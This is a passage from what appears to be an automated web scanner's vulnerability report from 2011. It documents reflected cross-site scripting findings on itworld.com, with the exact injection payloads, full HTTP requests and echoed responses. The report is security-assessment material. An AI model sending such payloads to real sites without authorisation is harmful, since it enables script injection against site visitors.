Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460561"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:22 GMT
X-Varnish: 1038167815
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contribaed49"-alert(1)-"196c36e6133/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We cou
...[SNIP]...

1.202. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f21ff"><script>alert(1)</script>de42be2d7ae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/jquery_uif21ff"><script>alert(1)</script>de42be2d7ae/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460570"
Content-Type: text/html; charset=utf-8
Content-Length: 57977
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:30 GMT
X-Varnish: 1038168328
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/jquery_uif21ff"><script>alert(1)</script>de42be2d7ae/jquery.ui/external/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.203. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ca3"-alert(1)-"88f2724cc11 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/jquery_uie7ca3"-alert(1)-"88f2724cc11/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460576"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:37 GMT
X-Varnish: 1038168585
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
ich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/jquery_uie7ca3"-alert(1)-"88f2724cc11/jquery.ui/external/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find
...[SNIP]...

1.204. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba60e"-alert(1)-"76c464bb13c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.uiba60e"-alert(1)-"76c464bb13c/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460587"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:48 GMT
X-Varnish: 1038168755
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/jquery_ui/jquery.uiba60e"-alert(1)-"76c464bb13c/external/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page
...[SNIP]...

1.205. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73430"><script>alert(1)</script>5906809cb50 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui73430"><script>alert(1)</script>5906809cb50/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460583"
Content-Type: text/html; charset=utf-8
Content-Length: 57977
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:43 GMT
X-Varnish: 1038168706
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui73430"><script>alert(1)</script>5906809cb50/external/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.206. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b2db"-alert(1)-"8f50261f95d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui/external8b2db"-alert(1)-"8f50261f95d/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460606"
Content-Type: text/html; charset=utf-8
Content-Length: 57756
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:10 GMT
X-Varnish: 1038169235
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
8-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/jquery_ui/jquery.ui/external8b2db"-alert(1)-"8f50261f95d/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you reque
...[SNIP]...

1.207. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba96"><script>alert(1)</script>f0594156723 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui/externalfba96"><script>alert(1)</script>f0594156723/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460596"
Content-Type: text/html; charset=utf-8
Content-Length: 57977
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:58 GMT
X-Varnish: 1038168928
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/externalfba96"><script>alert(1)</script>f0594156723/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.208. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df16"-alert(1)-"4a5965feccc was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie8df16"-alert(1)-"4a5965feccc/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460628"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:33 GMT
X-Varnish: 1038170471
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie8df16"-alert(1)-"4a5965feccc/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
...[SNIP]...

1.209. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab48a"><script>alert(1)</script>9e6ce0f041c was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookieab48a"><script>alert(1)</script>9e6ce0f041c/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
